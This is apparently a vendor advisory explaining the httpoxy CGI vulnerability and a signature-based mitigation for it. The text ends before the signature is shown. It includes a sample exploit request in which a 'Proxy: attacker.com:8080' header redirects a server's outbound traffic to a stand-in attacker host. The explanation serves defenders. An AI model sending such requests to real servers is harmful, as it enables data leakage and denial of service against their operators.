A major vulnerability in the CGI platform has been disclosed today, dubbed httpoxy.
The vulnerability was actually discovered 15 years ago in libwww-perl, and was fixed at the time.
However, various currently used libraries have been found to be vulnerable even today.
CGI Protocol-Specific Meta-Variables
RFC3875 describes the process of CGI setting system-wide environment variables based on user requests. CGI takes any custom header found in the requests, converts it to upper case, appends the string “HTTP_” to it, and sets it as an environment variable.
For example, the following request to a server that runs CGI:
GET /index.html HTTP/1.0 Host: example.com Foo: Bar
Will have the following environment variable set on the server:
The HTTP_PROXY Environment Variable
A local server on a well-segregated corporate network is often blocked to outgoing HTTP traffic directly, and uses a proxy with high security settings in order to reach servers outside of corporate network.
Many popular and common programs (such as wget, curl, elinks, lynx and more) use the HTTP_PROXY environment variable as part of their configuration.
This variable specifies the address of the proxy server the program should use in order to communicate with the outside world.
Exploiting The Weakness
By using the information learned so far, it’s easy to understand the disclosed vulnerability.
The following request will overwrite the HTTP_PROXY environment variable on the server, or simply set it if it doesn’t exist:
GET /cgi-bin/script.pl HTTP/1.0 Host: victim.com Proxy: attacker.com:8080
The result of this action will send outgoing traffic from the server to the attacker server.
Assuming the server is on a well-segregated network, the communication will be blocked by corporate firewall and simply cause Denial-of-Service on the server.
In the worst case, where the server actually has communication privileges to the outside world – Information leakage of sensitive data will be possible.
Using ASM signatures it’s possible to easily mitigate this vulnerability.
A user-defined signature can be created to block all attempts of httpoxy exploitation attempts, with regards to the “Proxy” header.
The user-defined signature should be created as such: